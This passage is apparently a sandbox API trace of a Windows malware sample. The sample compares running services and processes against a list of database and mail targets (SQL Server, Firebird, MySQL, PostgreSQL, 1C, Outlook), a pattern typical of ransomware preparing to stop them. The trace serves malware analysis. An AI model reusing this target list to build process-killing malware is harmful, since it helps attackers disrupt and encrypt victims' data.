	[0050.079] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0050.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0050.079] lstrlenW (lpString="Netman") returned 6
	[0050.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0050.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0050.079] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0050.079] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0050.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0050.079] lstrlenW (lpString="netprofm") returned 8
	[0050.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0050.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0050.079] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0050.079] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0050.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0050.079] lstrlenW (lpString="NlaSvc") returned 6
	[0050.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0050.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0050.080] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0050.080] lstrlenW (lpString="nsi") returned 3
	[0050.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0050.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0050.080] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0050.080] lstrlenW (lpString="PcaSvc") returned 6
	[0050.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0050.080] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0050.080] lstrlenW (lpString="PlugPlay") returned 8
	[0050.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0050.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0050.080] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0050.080] lstrlenW (lpString="Power") returned 5
	[0050.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0050.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0050.080] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0050.080] lstrlenW (lpString="ProfSvc") returned 7
	[0050.080] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0050.080] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0050.080] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0050.081] lstrlenW (lpString="RpcEptMapper") returned 12
	[0050.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0050.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0050.081] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0050.081] lstrlenW (lpString="RpcSs") returned 5
	[0050.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0050.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0050.081] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0050.081] lstrlenW (lpString="SamSs") returned 5
	[0050.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0050.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0050.081] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0050.081] lstrlenW (lpString="Schedule") returned 8
	[0050.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0050.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0050.081] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0050.081] lstrlenW (lpString="SENS") returned 4
	[0050.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0050.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0050.081] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0050.081] lstrlenW (lpString="ShellHWDetection") returned 16
	[0050.081] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0050.081] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0050.081] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0050.082] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0050.082] lstrlenW (lpString="Spooler") returned 7
	[0050.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0050.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0050.082] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0050.082] lstrlenW (lpString="swprv") returned 5
	[0050.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0050.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0050.082] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0050.082] lstrlenW (lpString="SysMain") returned 7
	[0050.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0050.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0050.082] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0050.082] lstrlenW (lpString="Themes") returned 6
	[0050.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0050.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0050.082] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0050.082] lstrlenW (lpString="TrkWks") returned 6
	[0050.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0050.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0050.082] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0050.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0050.082] lstrlenW (lpString="UxSms") returned 5
	[0050.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0050.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0050.083] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0050.083] lstrlenW (lpString="VSS") returned 3
	[0050.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0050.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0050.083] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0050.083] lstrlenW (lpString="WdiServiceHost") returned 14
	[0050.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0050.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0050.083] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0050.083] lstrlenW (lpString="WdiSystemHost") returned 13
	[0050.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0050.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0050.083] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0050.083] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0050.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.083] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.083] lstrlenW (lpString="Winmgmt") returned 7
	[0050.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0050.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0050.083] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0050.083] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0050.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0050.084] lstrlenW (lpString="WPDBusEnum") returned 10
	[0050.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0050.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0050.084] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0050.084] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0050.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0050.084] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb54b838 | out: hHeap=0x7d60000) returned 1
	[0050.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184
	[0050.086] Process32FirstW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0050.086] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0050.087] lstrlenW (lpString="System") returned 6
	[0050.087] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0050.087] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0050.087] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0050.087] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0050.087] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0050.087] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0050.087] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0050.087] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0050.088] lstrlenW (lpString="smss.exe") returned 8
	[0050.088] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0050.088] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0050.088] lstrlenW (lpString="csrss.exe") returned 9
	[0050.088] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0050.088] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0050.088] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0050.088] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0050.088] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0050.088] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0050.088] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0050.089] lstrlenW (lpString="wininit.exe") returned 11
	[0050.089] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0050.089] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0050.089] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0050.089] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0050.090] lstrlenW (lpString="csrss.exe") returned 9
	[0050.090] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0050.090] lstrlenW (lpString="winlogon.exe") returned 12
	[0050.090] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0050.091] lstrlenW (lpString="services.exe") returned 12
	[0050.091] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0050.091] lstrlenW (lpString="lsass.exe") returned 9
	[0050.091] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0050.092] lstrlenW (lpString="lsm.exe") returned 7
	[0050.092] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.092] lstrlenW (lpString="svchost.exe") returned 11
	[0050.092] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.092] lstrlenW (lpString="svchost.exe") returned 11
	[0050.093] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.093] lstrlenW (lpString="svchost.exe") returned 11
	[0050.093] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.093] lstrlenW (lpString="svchost.exe") returned 11
	[0050.093] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.094] lstrlenW (lpString="svchost.exe") returned 11
	[0050.094] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0050.094] lstrlenW (lpString="audiodg.exe") returned 11
	[0050.094] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.095] lstrlenW (lpString="svchost.exe") returned 11
	[0050.095] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.095] lstrlenW (lpString="svchost.exe") returned 11
	[0050.095] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0050.096] lstrlenW (lpString="dwm.exe") returned 7
	[0050.096] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0050.096] lstrlenW (lpString="explorer.exe") returned 12
	[0050.096] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0050.097] lstrlenW (lpString="spoolsv.exe") returned 11
	[0050.097] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0050.097] lstrlenW (lpString="taskhost.exe") returned 12
	[0050.097] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.098] lstrlenW (lpString="svchost.exe") returned 11
	[0050.098] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0050.099] lstrlenW (lpString="taskeng.exe") returned 11
	[0050.099] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0050.099] lstrlenW (lpString="taskhost.exe") returned 12
	[0050.099] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0050.100] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0050.100] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0050.100] lstrlenW (lpString="python tragedy.exe") returned 18
	[0050.100] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0050.101] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0050.101] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0050.101] lstrlenW (lpString="computers.exe") returned 13
	[0050.101] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0050.102] lstrlenW (lpString="separated.exe") returned 13
	[0050.102] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0050.102] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0050.102] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0050.103] lstrlenW (lpString="darkness.exe") returned 12
